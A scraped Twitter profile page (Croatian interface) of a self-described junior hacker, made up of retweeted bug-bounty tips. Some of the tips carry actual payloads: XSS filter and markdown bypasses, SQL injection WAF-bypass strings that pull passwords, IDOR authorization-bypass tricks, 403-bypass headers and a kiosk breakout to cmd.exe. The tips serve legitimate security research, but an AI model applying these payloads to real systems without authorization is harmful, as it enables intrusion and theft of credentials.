Christina Oh

@0xtina

Junior hacker at . Collection of resources. Tweets are representative of me only.

Singapore
Vrijeme pridruživanja: svibanj 2018.

Tweetovi

Blokirali ste korisnika/cu @0xtina

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @0xtina

  1. proslijedio/la je Tweet
    prije 11 sati

    XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()//

    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet
    prije 6 sati

    That’s genius. I wonder how many ssrf I’ve given up on and could have made work with this... 😭

    Poništi
  3. proslijedio/la je Tweet
    prije 11 sati

    Hey bug hunters! Want a look at some of the top vulnerabilities ever found on ? They just released the last blog post I wrote before leaving. Enjoy!

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    31. sij

    If an application uses markdown, make sure to test it for xss. I used [Click here](javascript:alert(1)), to create a link via markdown and when the user clicks on Click here, the xss will get executed. Read this article.

    Poništi
  5. proslijedio/la je Tweet
    29. sij

    SQL Injection WAF bypass techniques 1.Nullbyte: %00' UNION SELECT password FROM Users WHERE username-'tom'-- 2. SQL Comments: '/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/usersame/**/LIKE/**/'tom'--

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    27. sij

    SpecterOps Adversary Tactics: PowerShell Course & Lab Material

    Poništi
  7. proslijedio/la je Tweet
    27. sij

    sqlmap can fail! Know how to fingerprint manually with db-unique functions: MySQL - database() MsSQL - db_name() SQLite - sqlite_version() PostgreSQL - current_database() The functions don't exist in other solutions, so if they work you know which one it is!

    Poništi
  8. proslijedio/la je Tweet
    27. sij

    Did you know that the address '<a@b.com>c@d.com' when given to SES will send an email to a@b.com? this could lead to interesting exploit scenarios with some email parsing libraries/code

    Poništi
  9. proslijedio/la je Tweet
    27. sij

    If you're asking yourself "is this the first time an AV was targeted by someone to own someone", you need to check this Github repository by

    Poništi
  10. proslijedio/la je Tweet
    27. sij

    There are some endpoints show JSON, but forget to set the header to “Content-type: application/json” and leave it as “Content-type: text/html” , and they show special chars , easy XSS ;)

    Poništi
  11. proslijedio/la je Tweet
    27. sij
    Poništi
  12. proslijedio/la je Tweet
    27. sij

    Windows Kiosk breakout tip: If you get a Printing panel, and the traditional methods don't work: Amongst the printers, select "SendTo OneNote" OneNote will launch -> Add new notebook On the Notebook -> New page Type: \\127.0.0.1\c$\windows\system32\cmd.exe Click the link

    Poništi
  13. proslijedio/la je Tweet
    27. sij

    Instant Admin Access!! always check JS files and request responses. This tool by is pretty good in looking for endpoints

    Prikaži ovu nit
    Poništi
  14. proslijedio/la je Tweet
    27. sij

    -API TIP:26/31- Looking for BOLA (IDOR) in APIs? got 401/403 errors? AuthZ bypass tricks: * Wrap ID with an array {“id”:111} --> {“id”:[111]} * JSON wrap {“id”:111} --> {“id”:{“id”:111}} * Send ID twice URL?id=<LEGIT>&id=<VICTIM> * Send wildcard {"user_id":"*"}

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    25. sij

    THC RELEASE: Our favourite Tips, Tricks & Hacks. Help us and add your favourite tricks to the CHEAT SHEET:

    Poništi
  16. proslijedio/la je Tweet
    24. sij

    Here are my (updated) slides from for my talk "Owning The Cloud Through SSRF & PDF Generators" with Chris Holt from . Big thank you to , , , , , and !

    Poništi
  17. proslijedio/la je Tweet
    22. sij

    if you find 403 Forbidden while testing. Try X-Original-URL and X-Rewrite-URL Headers to bypass restrictions

    Poništi
  18. proslijedio/la je Tweet
    18. sij

    Here my GitHub with many scripts useful for red teamers - Enjoy!

    Poništi
  19. proslijedio/la je Tweet
    18. sij
    Poništi
  20. proslijedio/la je Tweet
    18. sij

    RDP to RCE: When Fragmentation Goes Wrong AKA: What we know about CVE-2020-0609 and CVE-2020-0610.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·